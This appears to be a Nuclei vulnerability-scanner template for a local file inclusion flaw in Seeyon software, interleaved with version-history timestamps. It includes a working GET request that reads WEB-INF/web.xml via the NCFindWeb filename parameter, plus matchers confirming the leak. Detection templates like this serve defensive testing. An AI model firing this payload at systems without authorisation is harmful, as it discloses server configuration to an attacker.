2022-01-06 06:30:31 +00:00
id : wooyun-2015-148227
2022-04-22 10:38:41 +00:00
2021-04-22 08:59:47 +00:00
info :
2022-08-05 13:57:51 +00:00
name : Seeyon WooYun - Local File Inclusion
2021-04-22 08:59:47 +00:00
author : princechaddha
severity : high
2022-08-05 13:57:51 +00:00
description : Seeyon WooYun allows remote attackers to include the content of locally stored content and disclose it back to the attacker via local file inclusion.
2022-04-22 10:38:41 +00:00
reference :
- https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html
2022-08-05 13:57:51 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cwe-id : CWE-22
2022-06-08 08:01:29 +00:00
tags : seeyon,wooyun,lfi,zhiyuan
2021-04-22 08:59:47 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml"
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
- "<servlet-name>NCInvokerServlet</servlet-name>"
part : body
- type : word
part : header
words :
- "application/xml"
2022-08-05 13:57:51 +00:00
# Enhanced by mp on 2022/08/04